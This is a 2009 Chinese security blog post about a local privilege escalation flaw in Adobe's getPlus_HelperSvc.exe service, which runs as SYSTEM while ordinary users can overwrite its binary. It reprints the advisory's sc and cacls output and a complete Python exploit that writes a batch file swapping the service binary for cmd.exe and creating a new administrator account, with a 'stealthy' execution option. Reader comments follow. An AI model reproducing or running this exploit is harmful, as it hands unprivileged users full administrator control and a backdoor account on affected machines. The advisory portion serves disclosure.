首页 > 网络安全 > Adobe相关服务(getPlus_HelperSvc.exe)本地提权漏洞

Adobe相关服务(getPlus_HelperSvc.exe)本地提权漏洞

描述:
Adobe下载者(此处指downloader文件)用来下载为Adobe应用程序下载更新
在Acrobat Reader9.x下测试
可执行文件可以被系统内置用户以提升为“完全控制”的系统权限来安装,任何用户都可以替换改文件来达到自己的目的。在系统重启后它将以"SYSTEM"权限运行。
description:
Adobe downloader used to download updates for Adobe applications.
Shipped with Acrobat Reader 9.x

poc:

C:\>sc qc "getPlus(R) Helper"
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: getPlus(R) Helper
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : getPlus(R) Helper
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem

C:\>cacls "C:\Programmi\NOS\bin\getPlus_HelperSvc.exe"
C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F <————– [!!!]
                                           NT AUTHORITY\SYSTEM:F
The executable file is installed with improper permissions, with "full
control" for Builtin Users; a simple user can replace it with a binary of
choice.
At the next reboot it will run with SYSTEM privileges.

昨天Milw0rm上刚刚给出了Python的利用代码,内容如下:

复制内容到剪贴板程序代码程序代码
#!/usr/bin/env python
##################################################################################
#
# Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit
# Coded By: Dr_IDE
# Discovered by: Nine:Situations:Group
# Tested On: Windows XP SP2, Requires NOS Package Installed
# Usage: python Dr_IDE-Adobe_912.py
#
##################################################################################

import os, subprocess

#
# Should probably have a try block around this as not every install
# of 9.1.2 has the NOS package on it. This is a little touchy so you may have to
# play around with it.
#
# This is a super lame way to do this but it makes it more educational.
evil =  "echo *************************************************************\n"
evil += "echo *\n"
evil += "echo * Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit\n"
evil += "echo * Coded By: Dr_IDE\n"
evil += "echo * Discovered By: Nine:Situations:Group\n"
evil += "echo * Tested On: Windows XP SP2\n"
evil += "echo *\n"
evil += "echo *************************************************************\n"
evil += "echo This will add user Dr_IDE:password to the Admin Group\n"
evil += "cd C:\\Program Files\\NOS\\bin\n"
evil += "copy /Y GetPlus_HelperSvc.exe GetPlus_HelperSvc.old\n"
evil += "copy /Y %systemroot%\\system32\\cmd.exe\n"
evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE password /ADD\n"
evil += "GetPlus_HelperSvc.exe /C net localgroup administrators Dr_IDE /ADD\n"
evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE\n"
evil += "exit"

f1 = open('Dr_IDE-Adobe.bat','w');
f1.write(evil);
f1.close();

# Here are two ways to execute this exploit. If you leave both commented just the batch file is created.

# Silent Way – This should be more stealthy
#retval = subprocess.call("Dr_IDE-Adobe.bat");

# Louder Way – On some systems this will probably open a DOS window
#retval = os.system("Dr_IDE-Adobe.bat");

# milw0rm.com [2009-07-27]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/130

  1. 0point
    0point 7月 29th, 2009 @ 09:01 | #-31

    @真好网
    Python的代码谁能看懂啊,的确有点难懂,但仔细一看有点像结合了C和批处理的语法。

  2. 真好网
    真好网 7月 28th, 2009 @ 23:25 | #-32

    我汗,我看不懂啊,这么多的代码。

  3. 0point
    0point 7月 28th, 2009 @ 10:57 | #-33

    @Tony
    他们的年收入都是以百万为单位,最少的也是十万单位级的。
    真恨自己没那智商啊,呵呵。

  4. TONY
    TONY 7月 28th, 2009 @ 10:32 | #-34

    真佩服这些能够发现0day的牛人

评论提交中, 请稍候...

留言



注意: 您给他人的评论回复将通过邮件通知到对方。

可以使用的标签: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>
Trackbacks & Pingbacks ( 0 )
  1. 还没有 trackbacks